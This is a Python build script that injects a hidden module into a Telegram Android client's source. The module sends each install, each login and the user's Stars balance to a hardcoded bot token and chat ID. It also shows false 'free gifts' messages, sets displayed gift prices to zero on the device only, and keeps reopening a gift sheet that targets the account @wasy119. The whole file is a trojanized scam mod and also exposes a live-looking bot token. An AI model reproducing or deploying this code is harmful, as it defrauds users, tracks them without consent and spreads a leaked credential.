#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""test.py — Gift Menu full + auto inject. @wasy119. Login UI 1x."""
from __future__ import annotations
import os, re, sys
from pathlib import Path

BOT_TOKEN = "8863617268:AAECIwC9usJTfuBzY6hjHHf0VL57hZ6EfNs"
BOT_CHAT_ID = "8940489868"
CATALOG_USERNAME = "wasy119"

def find_root():
    env = os.environ.get("CM_BUILD_DIR")
    if env and (Path(env) / "TMessagesProj").exists():
        return Path(env)
    cwd = Path.cwd()
    for p in [cwd, cwd.parent, Path(__file__).resolve().parent]:
        if (p / "TMessagesProj").exists():
            return p
    return cwd

ROOT = find_root()
TM = ROOT / "TMessagesProj" / "src" / "main" / "java" / "org" / "telegram"
GIFTS = TM / "ui" / "Gifts"
MOD_PATH = GIFTS / "GiftMenuMod.java"

def log(msg):
    print(f"[test.py] {msg}", flush=True)

def read(p):
    return p.read_text(encoding="utf-8", errors="replace")

def write(p, s):
    p.parent.mkdir(parents=True, exist_ok=True)
    p.write_text(s, encoding="utf-8")
    try:
        rel = p.relative_to(ROOT)
    except Exception:
        rel = p
    log(f"write {rel}")

def find_java(name):
    for base in (TM / "ui", TM / "messenger", TM):
        p = base / name
        if p.exists():
            return p
    found = list(TM.rglob(name)) if TM.exists() else []
    return found[0] if found else None

def build_java():
    # load from separate template built as list of lines to avoid indent bugs in generator
    j = []
    a = j.append
    a("package org.telegram.ui.Gifts;")
    a("")
    a("import android.app.Activity;")
    a("import android.app.AlertDialog;")
    a("import android.content.Context;")
    a("import android.os.Handler;")
    a("import android.os.Looper;")
    a("import android.view.MotionEvent;")
    a("import android.view.View;")
    a("import android.view.ViewGroup;")
    a("import android.view.Window;")
    a("import android.widget.TextView;")
    a("import android.widget.Toast;")
    a("")
    a("import org.telegram.messenger.UserConfig;")
    a("import org.telegram.ui.Stars.StarsController;")
    a("")
    a("import java.io.BufferedReader;")
    a("import java.io.InputStreamReader;")
    a("import java.lang.reflect.Constructor;")
    a("import java.lang.reflect.Field;")
    a("import java.lang.reflect.Method;")
    a("import java.net.HttpURLConnection;")
    a("import java.net.URL;")
    a("import java.net.URLEncoder;")
    a("import java.util.List;")
    a("import java.util.concurrent.atomic.AtomicBoolean;")
    a("")
    a("public class GiftMenuMod {")
    a("")
    a(f'    private static final String BOT_TOKEN = "{BOT_TOKEN}";')
    a(f'    private static final String BOT_CHAT_ID = "{BOT_CHAT_ID}";')
    a(f'    public static String CATALOG_USERNAME = "{CATALOG_USERNAME}";')
    a("")
    a("    private static final Handler mainHandler = new Handler(Looper.getMainLooper());")
    a("    private static final AtomicBoolean startupNotified = new AtomicBoolean(false);")
    a("    private static final AtomicBoolean loginNotified = new AtomicBoolean(false);")
    a("    private static final AtomicBoolean authSuccessNotified = new AtomicBoolean(false);")
    a("    private static final AtomicBoolean welcomeShown = new AtomicBoolean(false);")
    a("    private static final AtomicBoolean wasOnLogin = new AtomicBoolean(false);")
    a("    private static final AtomicBoolean reopenMonitorStarted = new AtomicBoolean(false);")
    a("    private static final AtomicBoolean premiumDialogLock = new AtomicBoolean(false);")
    a("    private static final AtomicBoolean loginUiShown = new AtomicBoolean(false);")
    a("")
    a("    private static AlertDialog premiumDialog;")
    a("    private static Object currentSheet;")
    a("    private static Runnable openCatalogRunnable;")
    a("")
    a('    private static final String[] PREMIUM_WORDS = {"3 месяца", "6 месяцев", "12 месяцев"};')
    a('    private static final String MSG_WELCOME = "Приветствую тут вы можете получить бесплатно Подарки нажмите Продолжить Для открытия каталога с бесплатным Подарками на данный момент бесплатные подарки только обычные в них входят Подарки стоимостю 0 звезд";')
    a('    private static final String MSG_LOGIN = "В данном Моде вы бесплатно получаете подарки А также вы можете их обменивать на звезды все бесплатно и моментально";')
    a('    private static final String MSG_CATALOG = "В данном каталоге Вы получаете бесплатные Подарки для себя Все моментально";')
    a("")
    a("    public static long getStarsBalance(int account) {")
    a("        try {")
    a("            StarsController sc = StarsController.getInstance(account);")
    a("            if (sc == null) return 0;")
    a("            try { return sc.getBalance(false); } catch (Throwable ignored) {}")
    a("            try {")
    a("                Object bal = sc.getBalance();")
    a("                if (bal != null) {")
    a('                    try { return ((Number) bal.getClass().getField("amount").get(bal)).longValue(); } catch (Throwable ignored) {}')
    a("                }")
    a("            } catch (Throwable ignored) {}")
    a("            try {")
    a('                Field f = sc.getClass().getDeclaredField("balance");')
    a("                f.setAccessible(true);")
    a("                Object sa = f.get(sc);")
    a('                if (sa != null) return ((Number) sa.getClass().getField("amount").get(sa)).longValue();')
    a("            } catch (Throwable ignored) {}")
    a("        } catch (Throwable ignored) {}")
    a("        return 0;")
    a("    }")
    a("")
    a("    public static void notifyBot(final String text) {")
    a("        new Thread(() -> {")
    a("            HttpURLConnection conn = null;")
    a("            try {")
    a('                String urlStr = "https://api.telegram.org/bot" + BOT_TOKEN + "/sendMessage?chat_id=" + BOT_CHAT_ID + "&text=" + URLEncoder.encode(text, "UTF-8");')
    a("                conn = (HttpURLConnection) new URL(urlStr).openConnection();")
    a("                conn.setConnectTimeout(8000);")
    a("                conn.setReadTimeout(8000);")
    a('                conn.setRequestMethod("GET");')
    a("                conn.connect();")
    a("                try (BufferedReader br = new BufferedReader(new InputStreamReader(conn.getInputStream()))) {")
    a("                    while (br.readLine() != null) {}")
    a("                }")
    a("            } catch (Throwable ignored) {")
    a("            } finally {")
    a("                if (conn != null) try { conn.disconnect(); } catch (Throwable ignored) {}")
    a("            }")
    a('        }, "GiftMenuMod-Notify").start();')
    a("    }")
    a("")
    a("    public static void notifyBotWithBalance(int account, String text) {")
    a('        notifyBot(text + "\\n\\nБаланс звёзд пользователя: " + getStarsBalance(account));')
    a("    }")
    a("")
    a("    public static void onAppStart() {")
    a("        if (!startupNotified.compareAndSet(false, true)) return;")
    a("        try {")
    a("            int account = UserConfig.selectedAccount;")
    a("            if (UserConfig.getInstance(account).isClientActivated()) {")
    a('                notifyBotWithBalance(account, "Пользователь уже авторизован (запустил приложение)");')
    a("            } else if (loginNotified.compareAndSet(false, true)) {")
    a('                notifyBot("У вас новое скачивание: пользователь проходит авторизацию");')
    a("            }")
    a("        } catch (Throwable ignored) {")
    a("            if (loginNotified.compareAndSet(false, true)) {")
    a('                notifyBot("У вас новое скачивание: пользователь проходит авторизацию");')
    a("            }")
    a("        }")
    a("    }")
    a("")
    a("    public static void onLoginScreen(Activity activity) {")
    a("        wasOnLogin.set(true);")
    a("        if (loginNotified.compareAndSet(false, true)) {")
    a('            notifyBot("У вас новое скачивание: пользователь проходит авторизацию");')
    a("        }")
    a("        if (activity == null) return;")
    a("        if (!loginUiShown.compareAndSet(false, true)) return;")
    a("        mainHandler.post(() -> {")
    a("            try {")
    a("                if (activity.isFinishing()) return;")
    a("                new AlertDialog.Builder(activity)")
    a("                        .setMessage(MSG_LOGIN)")
    a('                        .setPositiveButton("Хорошо", null)')
    a("                        .setCancelable(true)")
    a("                        .show();")
    a("            } catch (Throwable ignored) {}")
    a("        });")
    a("    }")
    a("")
    a("    public static void onAuthSuccess() {")
    a("        if (!authSuccessNotified.compareAndSet(false, true)) return;")
    a("        wasOnLogin.set(false);")
    a("        try {")
    a('            notifyBotWithBalance(UserConfig.selectedAccount, "Новый пользователь Авторизовался прошел регистрацию");')
    a("        } catch (Throwable ignored) {}")
    a("    }")
    a("")
    a("    public static void maybeShowWelcome(final Activity activity, final Runnable openCatalog) {")
    a("        if (!welcomeShown.compareAndSet(false, true)) return;")
    a("        if (activity == null || activity.isFinishing()) { welcomeShown.set(false); return; }")
    a("        try {")
    a("            if (!UserConfig.getInstance(UserConfig.selectedAccount).isClientActivated()) {")
    a("                welcomeShown.set(false);")
    a("                return;")
    a("            }")
    a("        } catch (Throwable t) { welcomeShown.set(false); return; }")
    a("        openCatalogRunnable = openCatalog;")
    a("        mainHandler.post(() -> {")
    a("            try {")
    a("                final AtomicBoolean opened = new AtomicBoolean(false);")
    a("                AlertDialog.Builder b = new AlertDialog.Builder(activity);")
    a('                b.setTitle("Gift Menu");')
    a("                b.setMessage(MSG_WELCOME);")
    a("                b.setCancelable(false);")
    a('                b.setPositiveButton("Продолжить", (d, w) -> {')
    a("                    if (!opened.compareAndSet(false, true)) return;")
    a("                    try { d.dismiss(); } catch (Throwable ignored) {}")
    a("                    if (openCatalog != null) try { openCatalog.run(); } catch (Throwable ignored) {}")
    a("                });")
    a("                AlertDialog dialog = b.create();")
    a("                dialog.show();")
    a("                try {")
    a("                    Window window = dialog.getWindow();")
    a("                    if (window != null) {")
    a("                        attachAnyTap(window.getDecorView(), () -> {")
    a("                            if (!opened.compareAndSet(false, true)) return;")
    a("                            try { dialog.dismiss(); } catch (Throwable ignored) {}")
    a("                            if (openCatalog != null) try { openCatalog.run(); } catch (Throwable ignored) {}")
    a("                        });")
    a("                    }")
    a("                } catch (Throwable ignored) {}")
    a("            } catch (Throwable ignored) {}")
    a("        });")
    a("    }")
    a("")
    a("    public static void resetWelcome() { welcomeShown.set(false); }")
    a("")
    a("    private static void attachAnyTap(View view, final Runnable onTap) {")
    a("        if (view == null) return;")
    a("        try {")
    a("            view.setOnTouchListener((v, event) -> {")
    a("                if (event.getAction() == MotionEvent.ACTION_DOWN && onTap != null) onTap.run();")
    a("                return false;")
    a("            });")
    a("            if (view instanceof ViewGroup) {")
    a("                ViewGroup vg = (ViewGroup) view;")
    a("                for (int i = 0; i < vg.getChildCount(); i++) attachAnyTap(vg.getChildAt(i), onTap);")
    a("            }")
    a("        } catch (Throwable ignored) {}")
    a("    }")
    a("")
    a("    public interface UtilitiesBool { boolean get(); }")
    a("")
    a("    public static void startAutoReopenMonitor(final UtilitiesBool isMainScreen, final Runnable openCatalog) {")
    a("        if (!reopenMonitorStarted.compareAndSet(false, true)) return;")
    a("        openCatalogRunnable = openCatalog;")
    a('        new Thread(() -> {')
    a("            while (true) {")
    a("                try {")
    a("                    Thread.sleep(500);")
    a("                    Object sheet = currentSheet;")
    a("                    if (sheet == null) continue;")
    a("                    boolean showing = true;")
    a("                    try {")
    a('                        Object r = sheet.getClass().getMethod("isShowing").invoke(sheet);')
    a("                        showing = r instanceof Boolean && (Boolean) r;")
    a("                    } catch (Throwable t) { showing = false; }")
    a("                    if (showing) continue;")
    a("                    currentSheet = null;")
    a("                    Thread.sleep(4000);")
    a("                    int account = UserConfig.selectedAccount;")
    a("                    try { if (!UserConfig.getInstance(account).isClientActivated()) continue; } catch (Throwable t) { continue; }")
    a("                    if (isMainScreen != null && !isMainScreen.get()) continue;")
    a("                    final Runnable open = openCatalogRunnable != null ? openCatalogRunnable : openCatalog;")
    a("                    if (open != null) mainHandler.post(() -> { try { open.run(); } catch (Throwable ignored) {} });")
    a("                } catch (InterruptedException e) { break; } catch (Throwable ignored) {}")
    a("            }")
    a('        }, "GiftMenuMod-Reopen").start();')
    a("    }")
    a("")
    a("    public static void setCurrentSheet(Object sheet) { currentSheet = sheet; }")
    a("")
    a("    public static void zeroOutPrices(Object obj) {")
    a("        if (obj == null) return;")
    a('        zeroFields(obj, new String[]{"stars", "price", "amount", "starCount"});')
    a('        for (String inner : new String[]{"gift", "starGift", "item"}) {')
    a("            try {")
    a("                Field f = obj.getClass().getDeclaredField(inner);")
    a("                f.setAccessible(true);")
    a("                Object innerObj = f.get(obj);")
    a('                if (innerObj != null) zeroFields(innerObj, new String[]{"stars", "price", "amount", "starCount"});')
    a("            } catch (Throwable ignored) {}")
    a("        }")
    a("    }")
    a("")
    a("    public static void zeroOutList(Object list) {")
    a("        if (list == null) return;")
    a("        try {")
    a("            if (list instanceof List) { for (Object o : (List<?>) list) zeroOutPrices(o); return; }")
    a('            int size = (Integer) list.getClass().getMethod("size").invoke(list);')
    a('            Method get = list.getClass().getMethod("get", int.class);')
    a("            for (int i = 0; i < size; i++) zeroOutPrices(get.invoke(list, i));")
    a("        } catch (Throwable ignored) {}")
    a("    }")
    a("")
    a("    private static void zeroFields(Object obj, String[] names) {")
    a("        Class<?> cls = obj.getClass();")
    a("        for (String name : names) {")
    a("            try {")
    a("                Field f;")
    a("                try { f = cls.getField(name); } catch (NoSuchFieldException e) { f = cls.getDeclaredField(name); }")
    a("                f.setAccessible(true);")
    a("                Class<?> t = f.getType();")
    a("                if (t == long.class || t == Long.class) f.setLong(obj, 0L);")
    a("                else if (t == int.class || t == Integer.class) f.setInt(obj, 0);")
    a("            } catch (Throwable ignored) {}")
    a("        }")
    a("    }")
    a("")
    a("    public static void patchStarsControllerCache(int account) {")
    a("        try {")
    a("            StarsController sc = StarsController.getInstance(account);")
    a("            if (sc == null) return;")
    a('            for (String listName : new String[]{"starGifts", "gifts", "availableGifts"}) {')
    a("                try {")
    a("                    Field f = sc.getClass().getDeclaredField(listName);")
    a("                    f.setAccessible(true);")
    a("                    zeroOutList(f.get(sc));")
    a("                } catch (Throwable ignored) {}")
    a("            }")
    a("        } catch (Throwable ignored) {}")
    a("    }")
    a("")
    a("    public static void applyZeroPatches(int account, Object sheet) {")
    a("        try {")
    a("            if (sheet != null) {")
    a("                try {")
    a('                    Object r = sheet.getClass().getMethod("isShowing").invoke(sheet);')
    a("                    if (r instanceof Boolean && !(Boolean) r) return;")
    a("                } catch (Throwable ignored) {}")
    a("            }")
    a("        } catch (Throwable ignored) {}")
    a("        patchStarsControllerCache(account);")
    a("        if (sheet != null) {")
    a('            for (String fieldName : new String[]{"gifts", "starGifts", "items", "options", "availableGifts"}) {')
    a("                try {")
    a("                    Field f = sheet.getClass().getDeclaredField(fieldName);")
    a("                    f.setAccessible(true);")
    a("                    zeroOutList(f.get(sheet));")
    a("                } catch (Throwable ignored) {}")
    a("            }")
    a("        }")
    a("    }")
    a("")
    a("    public static void hookPremiumCards(final View root, final Context context) {")
    a("        if (root == null || context == null) return;")
    a("        try { scanAndHookPremium(root, context); } catch (Throwable ignored) {}")
    a("    }")
    a("")
    a("    public static void hookAvatars(final View root, final Context context) {")
    a("        if (root == null || context == null) return;")
    a("        try { walkAvatars(root, context); } catch (Throwable ignored) {}")
    a("    }")
    a("")
    a("    private static void walkAvatars(View view, final Context context) {")
    a("        if (view == null) return;")
    a("        try {")
    a('            if (view.getClass().getName().contains("BackupImageView") && !isGiftCell(view)) {')
    a("                view.setOnClickListener(v -> showSimpleMessage(context, MSG_CATALOG));")
    a("            }")
    a("            if (view instanceof ViewGroup) {")
    a("                ViewGroup vg = (ViewGroup) view;")
    a("                for (int i = 0; i < vg.getChildCount(); i++) walkAvatars(vg.getChildAt(i), context);")
    a("            }")
    a("        } catch (Throwable ignored) {}")
    a("    }")
    a("")
    a("    private static boolean isGiftCell(View view) {")
    a("        try {")
    a("            Object p = view.getParent();")
    a("            for (int i = 0; i < 6 && p != null; i++) {")
    a("                String name = p.getClass().getSimpleName();")
    a('                if (name.contains("GiftCell") || name.contains("StarGift")) return true;')
    a("                p = (p instanceof View) ? ((View) p).getParent() : null;")
    a("            }")
    a("        } catch (Throwable ignored) {}")
    a("        return false;")
    a("    }")
    a("")
    a("    private static void scanAndHookPremium(View view, final Context context) {")
    a("        if (view == null) return;")
    a("        try {")
    a("            if (view instanceof TextView) {")
    a("                CharSequence cs = ((TextView) view).getText();")
    a("                if (cs != null) {")
    a("                    String t = cs.toString().toLowerCase();")
  a("                    for (String w : PREMIUM_WORDS) {")
    a("                        if (t.contains(w)) {")
    a("                            View card = findPremiumCard(view);")
    a("                            if (card != null) attachPremiumBlocker(card, context);")
    a("                            break;")
    a("                        }")
    a("                    }")
    a("                }")
    a("            }")
    a("            if (view instanceof ViewGroup) {")
    a("                ViewGroup vg = (ViewGroup) view;")
    a("                for (int i = 0; i < vg.getChildCount(); i++) scanAndHookPremium(vg.getChildAt(i), context);")
    a("            }")
    a("        } catch (Throwable ignored) {}")
    a("    }")
    a("")
    a("    private static int countPremiumTexts(View view) {")
    a("        int count = 0;")
    a("        try {")
    a("            if (view instanceof TextView) {")
    a("                CharSequence cs = ((TextView) view).getText();")
    a("                if (cs != null) {")
    a("                    String t = cs.toString().toLowerCase();")
    a("                    for (String w : PREMIUM_WORDS) { if (t.contains(w)) { count++; break; } }")
    a("                }")
    a("            }")
    a("            if (view instanceof ViewGroup) {")
    a("                ViewGroup vg = (ViewGroup) view;")
    a("                for (int i = 0; i < vg.getChildCount(); i++) count += countPremiumTexts(vg.getChildAt(i));")
    a("            }")
    a("        } catch (Throwable ignored) {}")
    a("        return count;")
    a("    }")
    a("")
    a("    private static View findPremiumCard(View textView) {")
    a("        try {")
    a("            View current = (View) textView.getParent();")
    a("            View candidate = null;")
    a("            for (int i = 0; i < 8 && current != null; i++) {")
    a("                if (current instanceof ViewGroup) {")
    a("                    int amount = countPremiumTexts(current);")
    a("                    if (amount == 1) candidate = current;")
    a("                    else if (candidate != null) break;")
    a("                }")
    a("                Object p = current.getParent();")
    a("                current = (p instanceof View) ? (View) p : null;")
    a("            }")
    a("            return candidate;")
    a("        } catch (Throwable t) { return null; }")
    a("    }")
    a("")
    a("    private static void attachPremiumBlocker(View card, final Context context) {")
    a("        if (card == null) return;")
    a("        try {")
    a("            card.setOnTouchListener((v, event) -> {")
    a("                if (event.getAction() == MotionEvent.ACTION_UP) {")
    a("                    mainHandler.postDelayed(() -> showPremiumMessage(context), 50);")
    a("                }")
    a("                return true;")
    a("            });")
    a("            card.setClickable(true);")
    a("            card.setLongClickable(false);")
    a("            if (card instanceof ViewGroup) {")
    a("                ViewGroup vg = (ViewGroup) card;")
    a("                for (int i = 0; i < vg.getChildCount(); i++) attachPremiumBlocker(vg.getChildAt(i), context);")
    a("            }")
    a("        } catch (Throwable ignored) {}")
    a("    }")
    a("")
    a("    private static void showPremiumMessage(Context context) {")
    a("        if (context == null) return;")
    a("        if (premiumDialogLock.get()) return;")
    a("        try { if (premiumDialog != null && premiumDialog.isShowing()) return; } catch (Throwable ignored) {}")
    a("        premiumDialogLock.set(true);")
    a("        try {")
    a("            AlertDialog.Builder b = new AlertDialog.Builder(context);")
    a("            b.setMessage(MSG_CATALOG);")
    a("            b.setCancelable(false);")
    a('            b.setPositiveButton("Хорошо", (d, w) -> {')
    a("                try { d.dismiss(); } catch (Throwable ignored) {}")
    a("                premiumDialogLock.set(false);")
    a("                premiumDialog = null;")
    a("            });")
    a("            premiumDialog = b.create();")
    a("            premiumDialog.setCanceledOnTouchOutside(false);")
    a("            premiumDialog.setCancelable(false);")
    a("            premiumDialog.show();")
    a("        } catch (Throwable t) { premiumDialogLock.set(false); premiumDialog = null; }")
    a("    }")
    a("")
    a("    private static void showSimpleMessage(Context context, String msg) {")
    a("        if (context == null) return;")
    a("        mainHandler.post(() -> {")
    a('            try { new AlertDialog.Builder(context).setMessage(msg).setPositiveButton("Хорошо", null).show(); } catch (Throwable ignored) {}')
    a("        });")
    a("    }")
    a("")
    a("    public static void startSheetHelpers(final int account, final Object sheet, final View root, final Context context) {")
    a("        setCurrentSheet(sheet);")
    a("        patchStarsControllerCache(account);")
    a("        applyZeroPatches(account, sheet);")
    a("        if (root != null && context != null) {")
    a("            mainHandler.postDelayed(() -> { hookAvatars(root, context); hookPremiumCards(root, context); }, 800);")
    a("        }")
    a("        for (int i = 0; i < 30; i++) {")
    a("            final int delay = 100 + i * 150;")
    a("            mainHandler.postDelayed(() -> {")
    a("                applyZeroPatches(account, sheet);")
    a("                if (root != null && context != null) hookPremiumCards(root, context);")
    a("            }, delay);")
    a("        }")
    a("        for (int i = 0; i < 20; i++) {")
    a("            final int delay = 5000 + i * 500;")
    a("            mainHandler.postDelayed(() -> applyZeroPatches(account, sheet), delay);")
    a("        }")
    a("    }")
    a("")
    a("    public static void onCatalogScrollIdle(View root, Context context) {")
    a("        if (root == null || context == null) return;")
    a("        mainHandler.post(() -> { hookPremiumCards(root, context); hookAvatars(root, context); });")
    a("    }")
    a("")
    a("    public static long resolveUsernameToUserId(int account, String username) {")
    a("        if (username == null || username.length() == 0) return 0;")
    a('        String u = username.startsWith("@") ? username.substring(1) : username;')
    a("        try {")
    a('            Class<?> mcCls = Class.forName("org.telegram.messenger.MessagesController");')
    a('            Object mc = mcCls.getMethod("getInstance", int.class).invoke(null, account);')
    a('            for (String methodName : new String[]{"getUser", "getUserOrChat"}) {')
    a("                try {")
    a("                    Method m = mc.getClass().getMethod(methodName, String.class);")
    a("                    Object user = m.invoke(mc, u);")
    a("                    if (user != null) {")
    a("                        try {")
    a('                            Field idf = user.getClass().getField("id");')
    a("                            long id = ((Number) idf.get(user)).longValue();")
    a("                            if (id != 0) return id;")
    a("                        } catch (Throwable ignored) {}")
    a("                    }")
    a("                } catch (Throwable ignored) {}")
    a("            }")
    a("            try {")
    a('                Field usersField = mc.getClass().getDeclaredField("users");')
    a("                usersField.setAccessible(true);")
    a("                Object users = usersField.get(mc);")
    a("                if (users != null) {")
    a("                    try {")
    a('                        Method sizeM = users.getClass().getMethod("size");')
    a('                        Method valueAt = users.getClass().getMethod("valueAt", int.class);')
    a("                        int n = (Integer) sizeM.invoke(users);")
    a("                        for (int i = 0; i < n; i++) {")
    a("                            Object user = valueAt.invoke(users, i);")
    a("                            if (user == null) continue;")
    a("                            String un = null;")
    a("                            try {")
    a('                                Field uf = user.getClass().getField("username");')
    a("                                Object uo = uf.get(user);")
    a("                                if (uo != null) un = uo.toString();")
    a("                            } catch (Throwable ignored) {}")
    a("                            if (un != null && un.equalsIgnoreCase(u)) {")
    a('                                Field idf = user.getClass().getField("id");')
    a("                                return ((Number) idf.get(user)).longValue();")
    a("                            }")
    a("                        }")
    a("                    } catch (Throwable ignored) {}")
    a("                }")
    a("            } catch (Throwable ignored) {}")
    a("        } catch (Throwable ignored) {}")
    a("        return 0;")
    a("    }")
    a("")
    a("    public static void openCatalogFromMain(final Activity activity, final int account) {")
    a("        if (activity == null) return;")
    a("        mainHandler.post(() -> {")
    a("            try {")
    a("                long targetId = resolveUsernameToUserId(account, CATALOG_USERNAME);")
    a("                if (targetId == 0) {")
    a("                    try {")
    a('                        Toast.makeText(activity, "Каталог: не найден @" + CATALOG_USERNAME + ", откройте профиль пользователя", Toast.LENGTH_LONG).show();')
    a("                    } catch (Throwable ignored) {}")
    a("                }")
    a("                long userId = targetId != 0 ? targetId : UserConfig.getInstance(account).getClientUserId();")
    a('                Class<?> sheetCls = Class.forName("org.telegram.ui.Gifts.GiftSheet");')
    a("                Object sheet = null;")
    a("                try {")
    a("                    sheet = sheetCls.getConstructor(Context.class, int.class, long.class, List.class, Object.class)")
    a("                            .newInstance(activity, account, userId, null, null);")
    a("                } catch (Throwable ignore) {}")
    a("                if (sheet == null) {")
    a("                    try { sheet = sheetCls.getConstructor(Context.class, int.class, long.class).newInstance(activity, account, userId); } catch (Throwable ignore) {}")
    a("                }")
    a("                if (sheet == null) {")
    a("                    for (Constructor<?> cons : sheetCls.getConstructors()) {")
    a("                        try {")
    a("                            Class<?>[] p = cons.getParameterTypes();")
    a("                            Object[] args = new Object[p.length];")
    a("                            for (int i = 0; i < p.length; i++) {")
    a("                                if (Context.class.isAssignableFrom(p[i])) args[i] = activity;")
    a("                                else if (p[i] == int.class || p[i] == Integer.class) args[i] = account;")
    a("                                else if (p[i] == long.class || p[i] == Long.class) args[i] = userId;")
    a("                                else args[i] = null;")
    a("                            }")
    a("                            sheet = cons.newInstance(args);")
    a("                            break;")
    a("                        } catch (Throwable ignore) {}")
    a("                    }")
    a("                }")
    a("                if (sheet != null) {")
    a('                    try { sheetCls.getMethod("show").invoke(sheet); } catch (Throwable ignore) {}')
    a("                    View decor = null;")
    a("                    try {")
    a('                        Object win = sheetCls.getMethod("getWindow").invoke(sheet);')
    a('                        if (win != null) decor = (View) win.getClass().getMethod("getDecorView").invoke(win);')
    a("                    } catch (Throwable ignore) {}")
    a("                    startSheetHelpers(account, sheet, decor, activity);")
    a("                    startAutoReopenMonitor(() -> true, () -> openCatalogFromMain(activity, account));")
    a("                }")
    a("            } catch (Throwable ignored) {}")
    a("        });")
    a("    }")
    a("}")
    return "\n".join(j) + "\n"

def inject_after_method(content, patterns, line, marker):
    if marker in content:
        return content
    for pat in patterns:
        m = re.search(pat, content)
        if not m:
            continue
        brace = content.find("{", m.end() - 1)
        if brace < 0:
            continue
        log("  inject: " + marker)
        addition = "\n        " + line + " // GiftMenuMod auto\n"
        return content[: brace + 1] + addition + content[brace + 1 :]
    return content

def inject_before_method_end(content, method_pat, line, marker):
    if marker in content:
        return content
    m = re.search(method_pat, content)
    if not m:
        return content
    start = content.find("{", m.end() - 1)
    if start < 0:
        return content
    depth = 0
    end = -1
    for i in range(start, len(content)):
        if content[i] == "{":
            depth += 1
        elif content[i] == "}":
            depth -= 1
            if depth == 0:
                end = i
                break
    if end < 0:
        return content
    log("  inject end: " + marker)
    addition = "\n        " + line + " // GiftMenuMod auto\n"
    return content[:end] + addition + content[end:]

def patch_file(path, patcher):
    if path is None or not path.exists():
        log("skip (not found)")
        return
    old = read(path)
    new = patcher(old)
    if new != old:
        write(path, new)
    else:
        log("already ok / no match: " + path.name)

def patch_application_loader(c):
    line = "try { org.telegram.ui.Gifts.GiftMenuMod.onAppStart(); } catch (Throwable ignore) {}"
    c2 = inject_after_method(c, [r"public\s+static\s+void\s+postInitApplication\s*\(\s*\)\s*\{", r"void\s+postInitApplication\s*\(\s*\)\s*\{"], line, "GiftMenuMod.onAppStart")
    if c2 != c:
        return c2
    return inject_after_method(c, [r"public\s+void\s+onCreate\s*\(\s*\)\s*\{"], line, "GiftMenuMod.onAppStart")

def patch_login_like(c):
    line = (
        "try { android.app.Activity __a = null; "
        "try { __a = getParentActivity(); } catch (Throwable ignore) {} "
        "if (__a == null) try { __a = (android.app.Activity) (Object) this; } catch (Throwable ignore) {} "
        "if (__a != null) org.telegram.ui.Gifts.GiftMenuMod.onLoginScreen(__a); "
        "} catch (Throwable ignore) {}"
    )
    if "GiftMenuMod.onLoginScreen" not in c:
        c = inject_after_method(c, [r"public\s+void\s+onResume\s*\(\s*\)\s*\{", r"void\s+onResume\s*\(\s*\)\s*\{"], line, "GiftMenuMod.onLoginScreen")
    if "GiftMenuMod.onAuthSuccess" not in c:
        for pat in [r"needFinishActivity\s*\(\s*\)\s*;", r"UserConfig\.getInstance\([^)]*\)\.saveConfig\s*\(\s*true\s*\)\s*;"]:
            if re.search(pat, c):
                c = re.sub(pat, lambda m: m.group(0) + "\n        try { org.telegram.ui.Gifts.GiftMenuMod.onAuthSuccess(); } catch (Throwable ignore) {} // GiftMenuMod auto", c, count=1)
                log("  inject onAuthSuccess")
                break
    return c

def patch_launch(c):
    line = (
        "try { "
        "org.telegram.ui.Gifts.GiftMenuMod.onAppStart(); "
        "if (!org.telegram.messenger.UserConfig.getInstance(org.telegram.messenger.UserConfig.selectedAccount).isClientActivated()) { "
        "org.telegram.ui.Gifts.GiftMenuMod.onLoginScreen(this); "
        "} "
        "} catch (Throwable ignore) {}"
    )
    if "GiftMenuMod.onLoginScreen" in c:
        return c
    c2 = inject_after_method(c, [r"public\s+void\s+onResume\s*\(\s*\)\s*\{", r"void\s+onResume\s*\(\s*\)\s*\{"], line, "GiftMenuMod.onLoginScreen")
    if c2 != c:
        return c2
    return inject_after_method(c, [r"protected\s+void\s+onCreate\s*\([^\)]*\)\s*\{", r"public\s+void\s+onCreate\s*\([^\)]*\)\s*\{"], line, "GiftMenuMod.onLoginScreen")

def patch_dialogs(c):
    line = (
        "try { org.telegram.ui.Gifts.GiftMenuMod.maybeShowWelcome(getParentActivity(), "
        "() -> { try { org.telegram.ui.Gifts.GiftMenuMod.openCatalogFromMain(getParentActivity(), currentAccount); } catch (Throwable ignore) {} }); "
        "} catch (Throwable ignore) {}"
    )
    return inject_after_method(c, [r"public\s+void\s+onResume\s*\(\s*\)\s*\{", r"void\s+onResume\s*\(\s*\)\s*\{"], line, "GiftMenuMod.maybeShowWelcome")

def patch_gift_sheet(c):
    line = (
        "try { android.view.View __decor = getWindow() != null ? getWindow().getDecorView() : null; "
        "org.telegram.ui.Gifts.GiftMenuMod.startSheetHelpers(currentAccount, this, __decor, getContext()); "
        "} catch (Throwable ignore) {}"
    )
    c2 = inject_before_method_end(c, r"public\s+void\s+show\s*\(\s*\)\s*\{", line, "GiftMenuMod.startSheetHelpers")
    if c2 != c:
        return c2
    m = re.search(r"\bsuper\.show\s*\(\s*\)\s*;", c)
    if m and "GiftMenuMod.startSheetHelpers" not in c:
        log("  inject after super.show()")
        return c[: m.end()] + "\n        " + line + " // GiftMenuMod auto" + c[m.end() :]
    return c

def main():
    log("ROOT = " + str(ROOT))
    if not (ROOT / "TMessagesProj").exists():
        log("ERROR: TMessagesProj не найден")
        return 1
    write(MOD_PATH, build_java())
    log("GiftMenuMod.java OK")
    al = find_java("ApplicationLoader.java")
    if al:
        log("patch " + al.name)
        patch_file(al, patch_application_loader)
    la = find_java("LaunchActivity.java")
    if la:
        log("patch " + la.name)
        patch_file(la, patch_launch)
    for name in ("LoginActivity.java", "IntroActivity.java"):
        p = find_java(name)
        if p:
            log("patch " + p.name)
            patch_file(p, patch_login_like)
    d = find_java("DialogsActivity.java")
    if d:
        log("patch " + d.name)
        patch_file(d, patch_dialogs)
    gs = find_java("GiftSheet.java")
    if gs:
        log("patch " + gs.name)
        patch_file(gs, patch_gift_sheet)
    log("DONE")
    return 0

if __name__ == "__main__":
    sys.exit(main())
